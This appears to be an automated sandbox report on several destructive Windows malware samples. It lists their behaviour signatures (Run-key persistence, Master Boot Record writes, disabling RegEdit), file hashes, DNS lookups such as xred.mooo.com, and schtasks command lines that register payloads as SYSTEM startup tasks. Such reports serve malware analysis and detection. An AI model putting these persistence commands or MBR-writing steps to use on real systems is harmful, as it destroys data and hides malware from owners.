Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\TrashMalwares-main\\._cache_mbr.exe" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\TrashMalwares-main\\._cache_Synaptics.exe" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | C:\mbr.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe"
C:\mbr.exe
"C:\mbr.exe"
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe" InjUpdate
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 216.58.204.78:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
Files
memory/1508-1-0x0000000000BA0000-0x0000000001F42000-memory.dmp
memory/1508-0-0x000007FEF5ED0000-0x000007FEF68BC000-memory.dmp
memory/1508-2-0x000000001C480000-0x000000001C500000-memory.dmp
C:\mbr.exe
| MD5 | c85aa1da29f23a5a711e2793d0630b5a |
| SHA1 | e079ef1963a710db2e35380e508eef86ff371fb1 |
| SHA256 | a19c688c6bebe44cc77ecf6bd998bb4f1799cefc91c5bd32cc8d6381e0177139 |
| SHA512 | 162e75f513518d5979f3c4a0e7ca6bf4b4333646bebee73a703c43c67c735f6ed244db25674f786881061418600123e92265e51e9ee5b6d34669ef71b72038cc |
memory/2972-12-0x0000000000220000-0x0000000000221000-memory.dmp
\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe
| MD5 | 578650d2b82375bb0f6be3a9108585b0 |
| SHA1 | 8f25b9a24254c2ec99ee5625c70a0ae7067dc68b |
| SHA256 | 5ee16b324a60878ccef849bec862a4fa551cb304d8ce4056d49df10fb8ec9f2f |
| SHA512 | 4c46d53bab8df399a63b33ac4c4bba2c99663b31fcd3ebb6bd01a9ccf1648a61a7034879fafced99adb9c60388590efb4462e404b9d5da7d8e2e60b480ffc657 |
memory/2556-33-0x0000000000400000-0x000000000043B000-memory.dmp
memory/2972-42-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/2536-45-0x00000000003E0000-0x00000000003E1000-memory.dmp
memory/1628-56-0x0000000000400000-0x000000000043B000-memory.dmp
memory/1508-62-0x000000001C480000-0x000000001C500000-memory.dmp
memory/2536-60-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/1508-64-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-65-0x000007FEF5ED0000-0x000007FEF68BC000-memory.dmp
memory/1508-66-0x000000001C480000-0x000000001C500000-memory.dmp
memory/2536-67-0x00000000003E0000-0x00000000003E1000-memory.dmp
memory/1508-68-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-69-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-70-0x000000001C480000-0x000000001C500000-memory.dmp
C:\rick.wav
| MD5 | 2634c1ac24432e18601bcd8171b8248e |
| SHA1 | 01135b2ace7d4437dd8d57a4dd88b0fd45c5bf35 |
| SHA256 | 66f05a63cc9ae2c641a0fe82ea6ada8142464853dd83b749a562235090adb20d |
| SHA512 | 9fc42b412c9aebb29cf6f0e2969b2c5515086114e44f3d4e259a51ee08824d4f1d25ac2f586d5e8915261191399dc7d53f91a6b897d2d5a756ce2ccabddd7cd3 |
memory/1508-74-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-75-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-76-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-80-0x000000001C480000-0x000000001C500000-memory.dmp
memory/2536-90-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/2536-121-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/1508-139-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-140-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-144-0x000000001C480000-0x000000001C500000-memory.dmp
memory/1508-147-0x000000001C480000-0x000000001C500000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
165s
Max time network
154s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bootrec.exe" | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe"
C:\Users\Admin\AppData\Local\Temp\bootrec.exe
"C:\Users\Admin\AppData\Local\Temp\bootrec.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\bootrec.exe"
Network
Files
memory/2564-0-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2564-1-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-2-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2564-3-0x0000000002520000-0x00000000025A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bootrec.exe
| MD5 | f14b989516f256db1befee3dee508f55 |
| SHA1 | fbd2c6b1d783debb9a69c5766d3672138e24e127 |
| SHA256 | c88dbbd0002395beaeaef3f855790abef3430d76307953825745339bdc1f9388 |
| SHA512 | bfa84b7837d3bcda55571710289092af7e6cb7ee48b21a2a032d24b495ddbe9259c07eeceb58fb2a5ac4482e2b120259fe5b95162eb632228c86516f41bf035e |
memory/2168-11-0x0000000000400000-0x0000000000433000-memory.dmp
memory/2564-12-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2564-13-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-14-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-15-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-16-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-17-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-18-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-19-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-20-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-21-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-22-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-23-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-24-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-25-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-26-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-27-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-28-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-29-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-30-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-31-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-32-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-33-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-34-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-35-0x0000000002520000-0x00000000025A0000-memory.dmp
memory/2564-36-0x0000000002520000-0x00000000025A0000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:36
Platform
win7-20240221-en
Max time kernel
50s
Max time network
80s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\Program = "C:\\TEMP\\NetPakoe3.0.exe /autorun" | C:\Windows\system32\wscript.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2468 wrote to memory of 2128 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe | C:\Windows\system32\wscript.exe |
| PID 2468 wrote to memory of 2128 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe | C:\Windows\system32\wscript.exe |
| PID 2468 wrote to memory of 2128 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe | C:\Windows\system32\wscript.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\1362.tmp\1363.tmp\1364.vbs //Nologo
Network
Files
C:\Users\Admin\AppData\Local\Temp\1362.tmp\1363.tmp\1364.vbs
| MD5 | 36072dc09cf0a99e3936b50bacd9a3e5 |
| SHA1 | 731ede51ad7869ae0b01248267b0354a5fe52cba |
| SHA256 | a8dd0c012506f5ec41f90909e88de316ce3cbdb294db2b925c832af104e8b94f |
| SHA512 | c4d9858e67295ef124218e2493e9990427df16bc722df621ffebbcc4229e270f42fbccd9a2376448c19319ab18c1982f6d9a7371a77c148d434a64b8fe0a874d |
Analysis: behavioral8
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win10v2004-20240226-en
Max time kernel
148s
Max time network
143s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Anatralier.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\mbrwriter.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\mlt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\mousedraw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\ATohou.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\circle.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\AWave.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\reds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\cubes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\scl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\PatBlt3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.tmp\txtout2.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\B882.tmp\mbrwriter.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Anatralier.exe
"C:\Users\Admin\AppData\Local\Temp\Anatralier.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B882.tmp\B883.bat C:\Users\Admin\AppData\Local\Temp\Anatralier.exe"
C:\Windows\system32\cscript.exe
cscript prompt.vbs
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mbrwriter.exe
mbrwriter.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\1.exe
1.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mlt.exe
mlt.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mousedraw.exe
mousedraw.exe
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2ec 0x3a0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4084 --field-trial-handle=2432,i,12161922670941700748,3348345705955601576,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\taskkill.exe
taskkill /f /im 1.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im mlt.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\ATohou.exe
ATohou.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\circle.exe
circle.exe
C:\Windows\system32\timeout.exe
timeout 30
C:\Windows\system32\taskkill.exe
taskkill /f /im circle.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im ATohou.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\AWave.exe
AWave.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\reds.exe
reds.exe
C:\Windows\system32\timeout.exe
timeout 40
C:\Windows\system32\taskkill.exe
taskkill /f /im AWave.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im reds.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\bytebeat.exe
bytebeat.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\cubes.exe
cubes.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\scl.exe
scl.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\PatBlt3.exe
PatBlt3.exe
C:\Users\Admin\AppData\Local\Temp\B882.tmp\txtout2.exe
txtout2.exe
C:\Windows\system32\timeout.exe
timeout 60
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\B882.tmp\B883.bat
| MD5 | 9bbf761a8af3bc468e81625de8a66776 |
| SHA1 | af48afce2581501b5f8a1b949fe6f12145256653 |
| SHA256 | e0392f29af97bada38428aff5574776a44cb757c6ef8a7cfe9c93b86e8d61d5c |
| SHA512 | cce724b5ede94b729767b449b29082399b8d041e5fb51b75164807ae0d249eac0fb17aaec43e0077493ee8b5c03b6d9f89f050e063c8b0009fa7beefdb329e66 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\prompt.vbs
| MD5 | 7d598596e9af07501ca9f98f5d32166e |
| SHA1 | 21c748745a9c2f98ee88cfeb9d3d0d77523a0aa0 |
| SHA256 | 4f641829a7a076a5c5d77e4561779d62a3dded791fbf52e10bcbd0c3045ad402 |
| SHA512 | a63cceb82d70810feaf94c85123f8f861f59b918b9168d43efb6ef2ba8e82ed410718d540a2fa0d74aecfd40dda1c23e25563c52fe69b80407c31a661b81a561 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mbrwriter.exe
| MD5 | e2b95fc712d453a57101f9867d384d2c |
| SHA1 | 993eb1acb51ad2ab2e280d3729a56817a3097085 |
| SHA256 | e505465cef9e734ef29dd9803c848960a55dc6c35fa4bf8c275336d2119ddc62 |
| SHA512 | 25a4b6cc6d8908933ef13737aabe0bd56c1356b5f98bfe3e09c6b92fb358a1a65e35549e2d624574fda23fc91731091f0a80eeb9dc5ca2c1d96ba9a88fd5f109 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\1.exe
| MD5 | a14ba46ecdc37d9e73efd734b0ab4db9 |
| SHA1 | 9e72f4b89d2643110b2e3efc80c14222a5e00014 |
| SHA256 | 94aa578b5c5fe98f2f8e81705fff8addab6f2f4c2749778ef942b1cfab5b6aa8 |
| SHA512 | 432bbda373fb97bef1a1a8a7292eb85f70cb7866741bf000d5775a6a9a261124ab24b3e053a6f4726a5b3e48d5c5de4f86deb24ea25265dd0945b9740156268b |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mlt.exe
| MD5 | bc183f5854488a0774969ec19b492153 |
| SHA1 | 2e08a1bbf1b09d989f86b80ce5cdc4f22dc65ad5 |
| SHA256 | 4b97506ae7118dea78e251492166888732815f5cdc90b9c56de2f9ee3862b20f |
| SHA512 | 25a0d999d5d620f48e8d4bc1cb59013ecb5d33250d72e23211e5348fb38573cb3ec82a8370547b59bde9c4d7e555ec7f1dd48c284eabf0f33b595e562f4d3780 |
memory/1180-56-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B882.tmp\mousedraw.exe
| MD5 | f7db0edd465e545dcd947f4beef32779 |
| SHA1 | a02d2dcbe4ea1146b726a6191354340f8dd41f6a |
| SHA256 | 9bbce9c9e1b513084b8a206e935b2512a341fd81688e71735ef27511d0378d47 |
| SHA512 | 6d40cf365a30277328f9103083e939ac8fedf860ffef6d0c5bd80d708e0f73d606f456d37aa1fa5e69964ac2e20c263fbaa755a9c28eff962395e3509a7a4e25 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\1.wav
| MD5 | 8c5007acc14fc8fd7aa7dc659e30ebb5 |
| SHA1 | 91025f286d71dd7821989c24f752369c360386ba |
| SHA256 | bcfd13d3f19003f29e2ebf48a696972a427ba53c7d93f59340431d00e550c30e |
| SHA512 | 0cb8a6e4760410a4f739f32339a8ee85fc7e41099eba204d255bda5e9497ab584b1483115617c946dcbe7c8ba8c3d0763d81d29cbaf70812213f9ad17d974188 |
memory/3236-61-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4656-62-0x0000000000400000-0x000000000041D000-memory.dmp
memory/3968-63-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B882.tmp\ATohou.exe
| MD5 | d7064aa7ee28f685757e7455d4e49c6a |
| SHA1 | 535d326ab1453bed0c050c8822aee9ef54c8b26e |
| SHA256 | 5028f3b3e63609038404bf6e3c2dbc360892312d85aa11e83489f381f09fb99b |
| SHA512 | 2a0747087ea14c664688d3453be8f40d396ca916143f0473eb1739fbe5cf1f19a451359d1e8713fe19b3bdda21eaea20a8294b23c0d99dd793818e85b83c28f8 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\circle.exe
| MD5 | ed169e40a69cf73fd3ac59215b24063f |
| SHA1 | 32d49462e74e6c08b941d8cd530a5f3c0f3b5764 |
| SHA256 | b8ffde2fc69292ffa1a704a1cf977eedfc86277a61d4937245d218d22674178c |
| SHA512 | f949a7b9b5dae91f887e7ce9bb45f7500534873d3baab5f5c2b1c31b1e185e70278ceb9d4f03f495460e0fb96399239fa678b0b4750ee870cbaa6333ab5ebb6c |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\ATohou.wav
| MD5 | 69b31b718e20cc6723c4a816c2aceeb0 |
| SHA1 | 3a3213accba0d99792703b77da74ecd2a2b8510c |
| SHA256 | 9a517e95d9ad086fa73e5ab81bc26e6750e80c42ddb574ed51bedb97a9557c58 |
| SHA512 | 4c918a7d24e20fe60026576aafb625431a36bc4b83dc4c00d30859b0b40ca561046453b0a9c89a92a36dd733ffe3a17214d44653c6c39ef2f5e908ac4227f9ae |
memory/4012-87-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3684-88-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B882.tmp\AWave.exe
| MD5 | 9cbf1f1e4821fa5b8962423c9b2ecf24 |
| SHA1 | 7f3fd62332d10cfdb0be3452a71cd6df2d7c0602 |
| SHA256 | afcb1f5e73785c0c5952394ca69986e9b9e86cc5fb0a4de4684903a03d9859a4 |
| SHA512 | bee905b459259801185c55e25f8e70fa563ea8ecaa0ad300aea0379500fe683d6bc370ae3d7a0d53898443faf150a1081f23146c8e32deb6961fe955aa0003c8 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\reds.exe
| MD5 | 8ae9221dcd3eb86c479ad3a272e47c4b |
| SHA1 | fd55b36bdebd91773a2a14636fef6738c5fe9d35 |
| SHA256 | 4e46b8ffffd081aaeae5b5f21e8c1bc5c07eb6a16593c08b030c514cf55e8767 |
| SHA512 | 1d482f7c13269cdd546eaad0b4af7bd6a0d524c0df93365440b823bc6a4eb49e84332c683318fcf200e3375b6536bcdddac0e14bd73fbdeb4874a69c8ea41c02 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\AWave.wav
| MD5 | e62fbfae11374ec4a953725d0cee01be |
| SHA1 | 82e6be96bf64ee283ac3c6e8ca60acf4c8a47100 |
| SHA256 | 5dd0971a53b93394df0eba4bf8f4aa845a73c1306fe4fc0c130891fc8380838f |
| SHA512 | 74be448a3ec8746bf157e8e7e964c62914b24a618f339698cb4ad67803470d89563079e628b1f6243f0200a6d051bcfdc089a1ee177be23eca04ce00fa8df8fd |
memory/2372-104-0x0000000000400000-0x000000000041D000-memory.dmp
memory/4036-103-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B882.tmp\bytebeat.exe
| MD5 | 6dba963d56ae1fcdfd6e840a52416801 |
| SHA1 | 5ad332cce4c7556cc0aa72b9d5792f42e3873b3b |
| SHA256 | eb3940fb1f2a0b16f5e58c7f4b707fb26b6ee08ebe7f5c43b9c02fcf02fe4506 |
| SHA512 | c0ab4d15323aad3f35f82f90e55798a235f8c41fb84308f76566bd758c9a649031c11610af13bea472cf787ed18d53e6e61962ee41ad97854e028bbb47fc4edc |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\cubes.exe
| MD5 | ed695dac2b14ccad335e75f5ddd44139 |
| SHA1 | 35f4fae272c9b8dc84ffdae9b4dbfa4ed32936eb |
| SHA256 | 2d3e7cdbf244704934afa447552c049a891a9ccbd6d4ab42ca2504ad0a99e803 |
| SHA512 | a028c258cc65e208303f458279035d430f8447c6ca950d2de9c345aa7c2a13cff3a36fefdeb9305f8caaffc7da91fff91e05ef8e52b9d3672f7a71b49bbf47d5 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\scl.exe
| MD5 | af4005307577b1e437aa4ca33e00ec4b |
| SHA1 | 05eaefaa7d511a8b0d9c7a0819a4f20b5ea7d206 |
| SHA256 | 159c66ebe8ef08ca2a7502e76344bc0b8c1f9e51d7bed2bad1af164d7aa8a6f4 |
| SHA512 | c27366274ac12e20c11350da2fb9e668b8592e31764c249aaa29df28e1115d215e7604327d2e81c83107e0f70eec7da1443814f3883dc004806e918d62e8dad4 |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\bytebeat.wav
| MD5 | 29172c1ae05949d3b9e0f1ad6df73da4 |
| SHA1 | 73dfddb924eb3d0cf3b224e3617b3b249882a6e4 |
| SHA256 | 4d4900dcb852b2fe933abf00eba70f1c1ab3f0d9d479bb7ec781dafcc7c0796e |
| SHA512 | cd51bcd0f9f711ce385934ecf9d483e2ba1e64295f1f1db70361911b0c518e4e197bdbabfc630fb4d18f7bd785058fe009ac326f927d8fb00afe06deeacde95f |
C:\Users\Admin\AppData\Local\Temp\B882.tmp\PatBlt3.exe
| MD5 | 08e74e5f077f0337d0c0d15dde94f8be |
| SHA1 | d5ba49b2ddfe50ea4b214e0f447cbed7fb949279 |
| SHA256 | b41d36f67e147133f8c3aa054b52275f68d7e2735a65eb3abcdcd08bede1100b |
| SHA512 | f102a81b56c053a7c492a0459f9e7410346949074fc68e733ae9174651bb0265266560526782fe1e95cb2769f54fca3071f56839126d9fc8d7266828b9228fa1 |
